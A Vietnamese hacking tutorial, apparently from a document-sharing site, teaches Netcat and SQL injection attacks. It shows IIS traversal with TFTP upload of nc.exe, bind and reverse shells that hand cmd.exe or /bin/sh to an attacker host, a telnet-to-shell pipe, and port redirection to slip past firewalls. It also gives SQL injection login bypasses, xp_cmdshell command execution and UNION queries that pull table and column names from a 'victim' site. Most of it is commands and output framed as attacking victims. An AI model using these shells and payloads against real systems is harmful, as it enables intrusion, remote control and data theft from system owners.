NetCat– The Hacker "Swiss Army Knife"

Chia sẻ: Hack Long | Ngày: | Loại File: DOC | Số trang:47

1
652
lượt xem
352
download

NetCat– The Hacker "Swiss Army Knife"

Mô tả tài liệu
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Netcat là 1 tool cho phép ghi và đọc data thông qua TCP và UDP. Netcat có thể sử dụng như là port scanner, backdoor, port redirector, port listener...Trong bài lab này tôi sẽ demo quá trình hack, hoàn toàn chỉ sử dụng Netcat, để chứng minh netcat rất uyển chuyển. Port Scanning với Netcat....

Chủ đề:
Lưu

Nội dung Text: NetCat– The Hacker "Swiss Army Knife"

 1. NetCat Netcat – The Hacker "Swiss Army Knife" Netcat là 1 tool cho phép ghi và đọc data thông qua TCP và UDP .Netcat có thể sử dụng như là port scanner, backdoor,port redirector, port listener v.v. Trong bài lab này tôi sẽ demo quá trình hack, hoàn toàn chỉ sử dụng Netcat , để chứng minh netcat rất uyển chuyển. Port Scanning với Netcat Một vd scanning từ Hobbit "nc -v -w 2 -z target 20-30". Netcat sẽ thử kết nối đến mọi port giữa 20 và 30 trên target, và sẽ cho bạn biết FTP server, telnet server, và mailer . Khoá –z fast scanning mode chỉ thấy ports trên target is listening. Để hạn chế scanning speed,khoá -i sẽ insert 1k hoảng delay giữa mỗi port thăm dò. Netcat có thể sử dụng như port scanning nhưng không hoàn hảo. Nmap thích hợp nhất cho port scanning. Khi scanned 192.168.1.1, ports 1-200. Chúng ta thấy port 80, 21 và 25 open.
 2. Ở đây không phải là hacking IIS, nhưng sử dụng Netcat như 1 backdoor. Chúng ta gõ vào URL: http://192.168.1.90/scripts/..%255c../winn.../c+dir+c:\ đây là địa chỉ IIS server bị lỗi và chúng nhìn thấy ổ dĩa C với cây thư mục của IIS server. Bây giờ upload Netcat đến IIS server, chúng ta sử dụng TFTP và TFTP commands kết hợp với URL của IIS server.
 3. Chú ý URL có thêm 1 dấu (+) đánh dấu cho mỗi command. Như command: tftp –I 192.168.1.9 GET nc.exe được chuyển thành: http:///c+TFTP+-i+192.168.1.9+GET+nc.exe
 4. Hướng dẫn sử dụng Netcat 1. Giới thiệu Netcat là một công cụ không thể thiếu được nếu bạn muốn hack một website nào đó. Vì vậy bạn cần biết một chút về Netcat;) 2. Biên dịch Đối với bản Netcat cho Linux, bạn phải biên dịch nó trước khi sử dụng. - hiệu chỉnh file netcat.c bằng vi: vi netcat.c + tìm dòng res_init(); trong main() và thêm vào trước 2 dấu "/": // res_init(); + thêm 2 dòng sau vào phần #define (nằm ở đầu file): #define GAPING_SECURITY_HOLE #define TELNET - biên dịch: make linux - chạy thử: ./nc -h - nếu bạn muốn chạy Netcat bằng nc thay cho ./nc, bạn chỉ cần hiệu chỉnh lại biến môi trường PATH trong file ~/.bashrc, thêm vào ":." PATH=/sbin:/usr/sbin:...:. Bản Netcat cho Win không cần phải compile vì đã có sẵn file nhị phân nc.exe. Chỉ vậy giải nén và chạy là xong. 3. Các tùy chọn của Netcat Netcat chạy ở chế độ dòng lệnh. Bạn chạy nc -h để biết các tham số:
 5. C:\>nc -h connect to somewhere: nc [-options] hostname port[s] [ports] ... listen for inbound: nc -l -p port [options] [hostname] [port] options: -d detach from console, stealth mode -e prog inbound program to exec [dangerous!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h this cruft -i secs delay interval for lines sent, ports scanned -l listen mode, for inbound connects -L listen harder, re-listen on socket close -n numeric-only IP addresses, no DNS -o file hex dump of traffic -p port local port number -r randomize local and remote ports -s addr local source address -t answer TELNET negotiation -u UDP mode -v verbose [use twice to be more verbose] -w secs timeout for connects and final net reads -z zero-I/O mode [used for scanning] port numbers can be individual or ranges: m-n [inclusive] * Cú pháp: - chế độ kết nối : nc [-tùy_chọn] tên_máy cổng1[-cổng2] - chế độ lắng nghe: nc -l -p cổng [-tùy_chọn] [tên_máy] [cổng] * Một số tùy chọn: -d tách Netcat khỏi cửa sổ lệnh hay là console, Netcat sẽ chạy ở chế độ steath(không hiển thị trên thanh Taskbar) -e prog thi hành chương trình prog, thường dùng trong chế độ lắng nghe -h gọi hướng dẫn -i secs trì hoãn secs mili giây trước khi gởi một
 6. dòng dữ liệu đi -l đặt Netcat vào chế độ lắng nghe để chờ các kết nối đến -L buộc Netcat "cố" lắng nghe. Nó sẽ lắng nghe trở lại sau mỗi khi ngắt một kết nối. -n chỉ dùng địa chỉ IP ở dạng số, chẳng hạn như 192.168.16.7, Netcat sẽ không thẩm vấn DNS -o file ghi nhật kí vào file -p port chỉ định cổng port -r yêu cầu Netcat chọn cổng ngẫu nhiên(random) -s addr giả mạo địa chỉ IP nguồn là addr -t không gởi các thông tin phụ đi trong một phiên telnet. Khi bạn telnet đến một telnet daemon(telnetd), telnetd thường yêu cầu trình telnet client của bạn gởi đến các thông tin phụ như biến môi trường TERM, USER. Nếu bạn sử dụng netcat với tùy chọn -t để telnet, netcat sẽ không gởi các thông tin này đến telnetd. -u dùng UDP(mặc định netcat dùng TCP) -v hiển thị chi tiết các thông tin về kết nối hiện tại. -vv sẽ hiển thị thông tin chi tiết hơn nữa. -w secs đặt thời gian timeout cho mỗi kết nối là secs mili giây -z chế độ zero I/O, thường được sử dụng khi scan port Netcat hổ trợ phạm vi cho số hiệu cổng. Cú pháp là cổng1-cổng2. Ví dụ: 1-8080 nghĩa là 1,2,3,..,8080 4. Các ví dụ: 4.1 Chộp banner của web server Ví dụ: nc đến 172.16.84.2, cổng 80
 7. C:\>nc 172.16.84.2 80 HEAD / HTTP/1.0 (tại đây bạn gõ Enter 2 lần) HTTP/1.1 200 OK Date: Sat, 05 Feb 2000 20:51:37 GMT Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2 OpenSSL/0.9.6 PHP/4.0.4pl1 Connection: close Content-Type: text/html Để biết thông tin chi tiết về kết nối, bạn có thể dùng -v(-vv sẽ cho biết các thông tin chi tiết hơn nữa) C:\>nc -vv 172.16.84.1 80 172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [172.16.84.1] 80 (?) open HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Fri, 04 Feb 2000 14:46:43 GMT Server: Apache/1.3.20 (Win32) Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT ETag: "0-cec-3899eaea" Accept-Ranges: bytes Content-Length: 3308 Connection: close Content-Type: text/html sent 17, rcvd 245: NOTSOCK Nếu muốn ghi nhật kí, hãy dùng -o . Ví dụ:
 8. nc -vv -o nhat_ki.log 172.16.84.2 80 - xem file nhat_ki.log < 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK. < 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F < 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54 < 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT..Server: Ap < 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win < 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi < 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb < 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM < 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: "0-cec- < 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea"..Accep < 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes. < 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length: < 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308..Connectio < 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten < 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm < 000000f0 6c 0d 0a 0d 0a # l.... dấu < nghĩa là server gởi đến netcat dấu > nghĩa là netcat gởi đến server 4.2 Quét cổng - chạy netcat với tùy chọn -z. Để quét cổng nhanh hơn, hãy dùng -n vì netcat sẽ không cần thấm vấn DNS. Ví dụ để scan các cổng TCP(1->500) của host 172.16.106.1
 9. [dt@vicki /]# nc -nvv -z 172.16.106.1 1-500 (UNKNOWN) [172.16.106.1] 443 (?) open (UNKNOWN) [172.16.106.1] 139 (?) open (UNKNOWN) [172.16.106.1] 111 (?) open (UNKNOWN) [172.16.10]6.1] 80 (?) open (UNKNOWN) [172.16.106.1] 23 (?) open - nếu bạn cần scan các cổng UDP, dùng -u [dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500 (UNKNOWN) [172.16.106.1] 1025 (?) open (UNKNOWN) [172.16.106.1] 1024 (?) open (UNKNOWN) [172.16.106.1] 138 (?) open (UNKNOWN) [172.16.106.1] 137 (?) open (UNKNOWN) [172.16.106.1] 123 (?) open (UNKNOWN) [172.16.106.1] 111 (?) open 4.3 Biến Netcat thành một trojan - trên máy tính của nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn -l(listen) và -p port để xác định số hiệu cổng cần lắng nghe, -e để yêu cầu netcat thi hành 1 chương trình khi có 1 kết nối đến, thường là shell lệnh cmd.exe(đối với NT) hoặc /bin/sh(đối với Unix). Ví dụ: E:\>nc -nvv -l -p 8080 -e cmd.exe listening on [any] 8080 ... connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
 10. sent 0, rcvd 0: unknown socket error - trên máy tính dùng để tấn công, bạn chỉ việc dùng netcat nối đến máy nạn nhân trên cổng đã định, chẳng hạn như 8080 C:\>nc -nvv 172.16.84.2 8080 (UNKNOWN) [172.16.84.2] 8080 (?) open Microsoft Windows 2000 [Version 5.00.2195] © Copyright 1985-1999 Microsoft Corp. E:\>cd test cd test E:\test>dir /w dir /w Volume in drive E has no label. Volume Serial Number is B465-452F Directory of E:\test [.] [..] head.log NETUSERS.EXE NetView.exe ntcrash.zip password.txt pwdump.exe 6 File(s) 262,499 bytes 2 Dir(s) 191,488,000 bytes free C:\test>exit exit sent 20, rcvd 450: NOTSOCK Như bạn thấy, chúng ta đã có thể làm gì mà chẳng được với máy của nạn nhân qua shell lệnh này?! Tuy nhiên, sau kết nối trên, netcat trên máy nạn nhân cũng đóng luôn. Để yêu cầu netcat lắng nghe trở lại sau mỗi kết nối, bạn dùng -L thay cho -l. Lưu ý: -L chỉ có thể áp dụng cho bản Netcat for Windows, không áp dụng cho bản chạy trên Linux.
 11. E:\>nc -nvv -L -p 8080 -e cmd.exe listening on [any] 8080 ... - Riêng đối với Netcat cho Win, bạn có thể lắng nghe ngay trên cổng đang lắng nghe. Chỉ cần chỉ định địa chỉ nguồn là -s . Ví dụ: netstat -a ... TCP nan_nhan:domain nan_nhan:0 LISTENING nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 -> lắng nghe ngay trên cổng 53 listening on [172.16.84.1] 53 ... connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163 - Trên Windows NT, để đặt Netcat ở chế độ lắng nghe, không cần phải có quyền Administrator, chỉ cần login vào với 1 username bình thường khởi động Netcat là xong. - Chú ý: bạn không thể chạy netcat với ... -u -e cmd.exe... hoặc ...-u -e /bin/sh... vì netcat sẽ không làm việc đúng. Nếu bạn muốn có một UDP shell trên Unix, hãy dùng udpshell thay cho netcat. 5. Kĩ thuật tiên tiến 5.1 Telnet nghịch chuuyển - dùng telnet để nối cửa số netcat đang lắng nghe, kế đó đưa lệnh từ cửa sổ này vào luồng telnet nghịch chuyển, và gởi kết quả vào cửa sổ kia. Ví dụ: - trên máy dùng để tấn công(172.16.84.1), mở 2 cửa sổ netcat lần lượt lắng nghe trên cổng 80 và 25:
 12. + cửa sổ Netcat (1) C:\>nc -nvv -l -p 80 listennng on [any] 80 ... connect to [172.16.84.1] from [172.16.84.2] 1055 pwd ls -la _ + cửa sổ Netcat (2) C:\>nc -nvv -l -p 25 listening on [any] 25 ... connect to [172.16.84.1] from (UNKNOWN) [172.16.84.2] 1056 / total 171 drwxr-xr-x 17 root root 4096 Feb 5 16:15 . drwxr-xr-x 17 root root 4096 Feb 5 16:15 .. drwxr-xr-x 2 root root 4096 Feb 5 08:55 b ( ²?n drwxr-xr-x 3 root root 4096 Feb 5 14:19 boot drwxr-xr-x 13 root root 106496 Feb 5 14:18 dev drwxr-xr-x 37 root root 4096 Feb 5 14:23 et = ²? drwxr-xr-x 6 root root 4096 Feb 5 08:58 home drwxr-xr-x 6 root root 4096 Feb 5 08:50 l ( ²?b drwxr-xr-x 2 root root 7168 De = ²? 31 1969 mnt drwxr-xr-x 4 root root 4096 Feb 5 16:18 n = ²? drwxr-xr-x 2 root root 4096 Aug 23 12:03 opt dr-xr-xr-x 61 root root 0 Feb 5 09:18 pro = ²? drwx------ 12 root root 4096 Feb 5 16:24 root drwxr-xr-x 2 root root 4096 Feb 5 08:55 sb ( ²?n drwxrwxrwt 9 root root 4096 Feb 5 16:25 tmp drwxr-xr-x 13 root root 4096 Feb 5 08:42 usr drwxr-xr-x 18 root root 4096 Feb 5 08:52 var
 13. - trên máy tính nạn nhân(172.16.84.2), telnet nghịch chuyển đến máy dùng để tấn công(172.16.84.1), dùng /bin/sh để kết xuất: [root@nan_nhan /]# telnet 172.16.84.1 80 | /bin/sh | telnet 172.16.84.1 25 /bin/sh: Trying: command not found /bin/sh: Connected: command not found /bin/sh: Escape: command not found Trying 172.16.84.1... Connected to 172.16.84.1. Escape character is '^]'. _ Telnet trên máy nạn nhân sẽ chuyển tất cả những gì mà chúng ta gõ vào trong cửa sổ Netcat (1) - cổng 80 kết xuất sang cho /bin/sh thi hành. Kết quả của /bin/sh được kết xuất trở lại cho máy tính dùng để tấn công trên cửa sổ Netcat (2) - cổng 25. Nhiệm vụ của bạn là chỉ cần gõ lệnh vào cửa sổ Netcat (1) và xem kết quả trong cửa sổ Netcat (2). Sở dĩ tôi chọn cổng 80 và 25 vì các cổng này thường không bị firewalls hoặc filters lọc. 5.2 Tạo kênh sau Cũng tương tự như telnet nghịch chuyển. - trên máy tính dùng để tấn công, bạn đặt Netcat lắng nghe trên cổng 80 vì cổng này sẽ không bị firewall chặn: C:\>nc -nvv -l -p 80 listennng on [any] 80 ...
 14. - tiếp theo, từ shell lệnh của máy nạn nhân, bạn nối Netcat đến máy dùng để tấn công với tùy chọn -e để đổ shell: E:\>nc -e cmd.exe 172.16.84.1 80 Một khi máy nạn nhân thi hành chuổi lệnh trên, kênh sau nc sẽ được tạo, "nhét" shell (trong trường hợp này là cmd.exe) trở vào nc. Kể từ đây, chúng ta đã có 1 shell lệnh ảo. C:\>nc -nvv -l -p 80 listenning pm [any] 80 ... connect to [172.16.84.1] from [UNKNOWN] [172.16.84.3] 1035 Microsoft Windows 2000 [Version 5.00.2195] © Copyright 1985-1999 Microsoft Corp. E:\> 5.3 Đổi hướng cổng Bạn có thể dùng tunnel.pl hoặc fpipe.exe. Hãy xem ví dụ sau: - chạy nc trên cổng bất kì: E:\>nc -nvv -L -p 1234 -e cmd.exe listening on [any] 1234 ...
 15. - chạy tunnel hoặc fpipe để đổi hướng cổng C:\>perl tunnel.pl --port=53 --tohost=127.0.0.1 --toport=1234 C:\>fpipe -l 53 -r 1234 127.0.0.1 tunnel, fpipe sẽ lắng nghe trên cổng 53, sau đó chuyển tiếp kết nối đến 127.0.0.1:1024, đây là cổng mà netcat đang lắng nghe. Đổi hướng cổng là một cách để đi vòng qua firewalls.
 16. Tìm hiểu về SQL Injection 1) SQL Injection là gì? SQL Injection là một trong những kiểu hack web đang dần trở nên phổ biến hiện nay. Bằng cách inject các mã SQL query/command vào input trước khi chuyển cho ứng dụng web xử lí, bạn có thể login mà không cần username và password, remote execution, dump data và lấy root của SQL server. Công cụ dùng để tấn công là một trình duyệt web bất kì, chẳng hạn như Internet Explorer, Netscape, Lynx, ... 2) Tìm kiếm mục tiêu Bạn có thể search các trang web cho phép submit data ở bất kì một search-engine nào trên mạng, chẳng hạn như các trang login, search, feedback, ... http://victim/index.asp?id=10 Một số trang web chuyển tham số qua các field ẩn, bạn phải xem mã HTML mới thấy rõ. 3) Kiểm tra chỗ yếu của trang web Thử submit các field username, password hoặc field id, .. bằng hi' or 1=1-- - Login: hi' or 1=1-- - Pass: hi' or 1=1-- - http://victim/index.asp?id=hi' or 1=1-- Nếu site chuyển tham số qua field ẩn, bạn hãy download source HTML, lưu trên đĩa cứng và thay đổi lại URL cho phù hợp. Ví dụ: Nếu thành công, bạn có thể login vào mà không cần phải biết username và password 4) Tại sao ' or 1=1-- có thể bypass login? Giả sử như có một trang asp link đến một asp trang khác với URL như sau: http://victim/index.asp?category=food
 17. Trong URL trên, biến 'category' được gán giá trị là 'food'. Mã asp của trang này có thể như sau (đây chỉ là ví dụ thôi): v_cat = request("category") sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'" set rs=conn.execute(sqlstr) v_cat sẽ chứa giá trị của biến request.category, 'food' và câu lệnh SQL tiếp theo sẽ là: SELECT * FROM product WHERE PCategory='food' Dòng query trên sẽ trả về một tập resultset chứa một hoặc nhiều dòng phù hợp với điều kiện WHERE PCategory='food' Nếu bạn thay đổi URL trên thành http://victim/index.asp?category=food' or 1=1-- , biến v_cat sẽ chứa giá trị "food' or 1=1-- " và dòng lệnh SQL query sẽ là: SELECT * FROM product WHERE PCategory='food' or 1=1--' Dòng query trên sẽ select mọi thứ trong table product bất chấp PCategory có bằng 'food' hay không. Hai dấu gạch ngang "--" chỉ cho MS SQL server biết đã hết dòng query, mọi thứ còn lại sau "--" sẽ bị bỏ qua. Đối với MySQL, bạn hãy thay "--" thành "#" Bạn cũng có thể thử cách khác bằng cách submit ' or 'a'='a. Dòng SQL query bây giờ sẽ là: SELECT * FROM product WHERE PCategory='food' or 'a'='a' Một số data khác mà bạn cũng nên submit để biết xem trang web có gặp lỗi hay không: ' or 1=1-- " or 1=1-- or 1=1-- ' or 'a'='a " or "a"="a ') or ('a'='a 5) Thi hành lệnh từ xa bằng SQL Injection Nếu cài đặt với chế độ default, MS SQL Server sẽ chạy ở mức SYSTEM, tương đương với mức truy cập Administrator trên Windows. Bạn có thể dùng master..xp_cmdshell để thi hành lệnh từ xa: '; exec master..xp_cmdshell 'ping 10.10.1.2'--
 18. Hãy thử dùng dấu nháy đôi (") nếu dấu nháy đơn (') không làm việc. Dấu chấm phẩy (;) sẽ kết thúc dòng SQL query hiện tại và cho phép bạn thi hành một SQL command mới. Để kiểm tra xem lệnh trên có được thi hành hay không, bạn có thể listen các ICMP packet from 10.10.1.2 bằng tcpdump như sau: #tcpdump icmp Nếu nhận được ping request từ 10.10.1.2 nghĩa là lệnh đã được thi hành. 6) Nhận output của SQL query Bạn có thể dùng sp_makewebtask để ghi các output của SQL query ra một file HTML '; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES" folder "share" phải được share cho Everyone trước. 7) Nhận data qua 'database using ODBC error message' Các error message của MS SQL Server thường đưa cho bạn những thông tin quan trọng. Lấy ví dụ ở trên http://victim/index.asp?id=10, bây giờ chúng ta thử hợp nhất integer '10' với một string khác lấy từ CSDL: http://victim/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-- System table INFORMATION_SCHEMA.TABLES chứa thông tin về tất cả các table có trên server. Field TABLE_NAME chứa tên của mỗi table trong CSDL. Chúng ta chọn nó bởi vì chúng ta biết rằng nó luôn tồn tại. Query của chúng ta là: SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES- Dòng query này sẽ trả về tên của table đầu tiên trong CSDL Khi chúng ta UNION string này với số integer 10, MS SQL Server sẽ cố thử chuyển một string (nvarchar) thành một số integer. Điều này sẽ gặp lỗi nếu như không chuyển được nvarchar sang int, server sẽ hiện thông báo lỗi sau: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int. /index.asp, line 5
 19. Thông báo lỗi trên cho biết giá trị muốn chuyển sang integer nhưng không được, "table1". Đây cũng chính là tên của table đầu tiên trong CSDL mà chúng ta đang muốn có. Để lấy tên của tên của table tiếp theo, bạn có thể dùng query sau: http://victim/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')-- Bạn cũng có thể search data bằng từ khóa LIKE: http://victim/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'-- Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int. /index.asp, line 5 Mẫu so sánh '%25login%25' sẽ tương đương với %login% trong SQL Server. Như bạn thấy trong error message trên, chúng ta có thể xác định được tên của một table quan trọng là "admin_login". 8) Xác định tên của các column trong table Table INFORMATION_SCHEMA.COLUMNS chứa tên của tất cả các column trong table. Bạn có thể khai thác như sau: http://victim/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'-- Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int. /index.asp, line 5 Như vậy tên của column đầu tiên là "login_id". Để lấy tên của các column tiếp theo, bạn có thể dùng mệnh đề logic NOT IN () như sau: http://victim/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--
Đồng bộ tài khoản